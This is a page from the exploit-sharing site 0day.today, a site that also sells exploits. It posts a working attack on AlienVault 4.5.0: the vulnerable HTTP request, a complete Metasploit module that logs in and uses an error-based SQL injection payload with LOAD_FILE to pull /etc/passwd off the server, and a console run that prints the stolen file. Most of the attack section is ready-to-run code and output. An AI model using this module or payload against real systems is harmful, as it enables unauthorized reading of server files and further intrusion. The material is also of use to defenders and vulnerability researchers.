0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AlienVault 4.5.0 SQL Injection Vulnerability
[The following request is vulnerable to a SQL injection attack from authenticated users.
GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1
Host: 172.31.16.150
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==
Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;
Connection: keep-alive
------------------------------------------------------------------------------------------------
The following metasploit module will exploit this in order to read a file off of the file system:
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault 4.5.0 authenticated SQL injection arbitrary file read",
'Description' => %q{
AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
generation PHP file. This module exploits this to read an arbitrary file from
the file system. Any authed user should be usable. Admin not required.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
],
'References' =>
[
],
'Platform' => ['linux'],
'Privileged' => false,
'DisclosureDate' => "Mar 30 2014"))
register_options(
[
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']),
OptString.new('USERNAME', [ true, 'Single username', 'username']),
OptString.new('PASSWORD', [ true, 'Single password', 'password']),
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/'])
], self.class)
end
def run
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
})
cookie = res.get_cookies
post = {
'embed' => '',
'bookmark_string' => '',
'user' => datastore['USERNAME'],
'passu' => datastore['PASSWORD'],
'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie
})
if res.headers['Location'] != '/ossim/'
fail_with('Authentication failed')
end
cookie = res.get_cookies
done = false
i = 0
full = ''
while !done
pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x7175777471,"
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x2f6574632f706173737764)) AS CHAR),"
pay << "0x20)),#{(50*i)+1},50)),0x7169716d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << " GROUP BY x)a) AND 'xnDa'='xnDa"
get = {
'date_from' => pay,
'date_to' => '2014-03-30'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'),
'cookie' => cookie,
'vars_get' => get
})
file = /quwtq(.*)qiqmq/.match(res.body)
file = file[1]
if file == ''
done = true
end
str = [file].pack("H*")
full << str
vprint_status(str)
i = i+1
end
path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
print_good("File stored at path: " + path)
end
end
-----------------------------------------------------------------------------
Quick run of the module:
msf auxiliary(alienvault_isp27001_sqli) > show options
Module options (auxiliary/gather/alienvault_isp27001_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPATH /etc/passwd yes Path to remote file
PASSWORD password yes Single password
Proxies no Use a proxy chain
RHOST 172.31.16.150 yes The target address
RPORT 443 yes The target port
TARGETURI / yes Relative URI of installation
USERNAME username yes Single username
VHOST no HTTP server virtual host
msf auxiliary(alienvault_isp27001_sqli) > run
[+] File stored at path: /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt
[*] Auxiliary module execution completed
80922_default_172.31.16.150_alienvault.file_049766.txterry/.msf4/loot/201403300
[*] exec: cat /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt
root:x:0:0:root:/root:/usr/bin/llshell
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
munin:x:102:104::/var/lib/munin:/bin/false
postfix:x:103:106::/var/spool/postfix:/bin/false
snmp:x:104:108::/var/lib/snmp:/bin/false
hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
ossec:x:1000:1000::/var/ossec/:/bin/false
ossecm:x:1001:1000::/var/ossec/:/bin/false
ossecr:x:1002:1000::/var/ossec/:/bin/false
ntop:x:106:111::/var/lib/ntop:/bin/false
snort:x:107:112:Snort IDS:/var/log/snort:/bin/false
prads:x:108:113::/home/prads:/bin/false
nagios:x:109:114::/var/lib/nagios:/bin/false
mysql:x:110:115:MySQL Server,,,:/var/lib/mysql:/bin/false
asec:x:111:116:Alienvault smart event system user,,,:/var/lib/asec:/bin/false
mongodb:x:112:65534::/home/mongodb:/bin/false
avserver:x:113:121:AlienVault SIEM,,,:/home/avserver:/bin/false
avidm:x:114:121:AlienVault IDM,,,:/home/avidm:/bin/false
stunnel4:x:115:122::/var/run/stunnel4:/bin/false
avagent:x:116:121:AlienVault Agent,,,:/home/avagent:/bin/false
avapi:x:117:121:AlienVault SIEM,,,:/home/avapi:/bin/bash
rabbitmq:x:118:123:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false
avforw:x:119:121:AlienVault SIEM,,,:/home/avforw:/bin/false
msf auxiliary(alienvault_isp27001_sqli) >
# 0day.today [2024-11-15] #